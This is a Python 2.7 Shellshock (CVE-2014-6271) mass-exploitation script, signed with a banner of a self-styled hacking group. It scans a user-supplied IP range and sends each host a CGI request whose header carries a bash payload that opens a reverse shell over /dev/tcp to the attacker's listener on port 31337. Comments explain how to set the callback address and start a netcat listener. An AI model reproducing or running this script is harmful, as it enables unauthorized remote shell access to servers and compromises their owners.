We are...
                      _____                         _________              
                     /  _  \   ____   ____   ____  /   _____/ ____   ____  
                    /  /_\  \ /    \ /  _ \ /    \ \_____  \_/ __ \_/ ___\
                   /    |    \   |  (  <_> )   |  \/        \  ___/\  \___
                   \____|__  /___|  /\____/|___|  /_______  /\___  >\___  >
                           \/     \/            \/        \/     \/     \/
                                    //Laughing at your security since 2012*
=================================================================================================
Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult
                         - Gh05tFr3ak - xCyb3r 3vil7 -  Hassouna Khalil - spider64
=================================================================================================

# \!/ Enter your No-Ip address or other listening address in line 57 \!/  
#       \!/  Launch   nc -l 31337   before executing script!  \!/
# Dont forgets to update bash so you donts get PWNed while "testing"... lol
# yum -y update bash; apt-get -y update bash; reboot
# (Script is coded in python2.7, errors running with python3.0) 

import httplib,urllib

print "###########################################################"
print "###                  ShellShock.py                      ###"       
print "###       Bash 0-day Environment Variable Injector      ###"
print "###                  CVE-2014-6271                      ###"
print "### *************************************************** ###"
print "###                                                     ###"
print "###          It's either shell or be shelled            ###"                      
print "###                                                     ###"
print "###                    _.-''|''-._                      ###"
print "###                 .-'     |     `-.                   ###"
print "###               .'\       |       /`.                 ###"
print "###             .'   \      |      /   `.               ###"
print "###             \     \     |     /     /               ###"
print "###              `\    \    |    /    /'                ###"
print "###                `\   \   |   /   /'                  ###"
print "###                  `\  \  |  /  /'                    ###"
print "###                 _.-`\ \ | / /'-._                   ###"
print "###                {_____`\\|//'______}                  ###"
print "###                        `-'                          ###"
print "###                                                     ###"
print "### twitter.com/_d3f4ult                                ###"
print "###########################################################"
print "\n"     
print '\t\!/ Reverse shell returned on port 31337 \!/\n'
print '\t  Enter The First Three IP ranges To Scan \n'     
url = raw_input("          [Example : 123.456.789] : ")
finput = input("Enter the Starting IP of Range to Scan  : ")
sinput = input("Enter the Ending IP of Range to Scan for : ")
print
     
path = raw_input("Enter Vuln CGI Path : ")
     
for x in range(finput,sinput + 1):
         murl = url + "." + str(x)
         conn = httplib.HTTPConnection(murl)
         reverse_shell='() { :; }; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1'
         headers = {"Content-type": "application/x-www-form-urlencoded",
         "test": reverse_shell}
         conn.request("GET",path,headers=headers)
         res = conn.getresponse()
     
         if str(res.status) == '200':
                  print "[+] Website Present and Payload Successfully Sent To " + murl + path
                  data = res.read()
                  print data
         else:
                  print "[!]" + murl + path + " Is Not Vulnerable."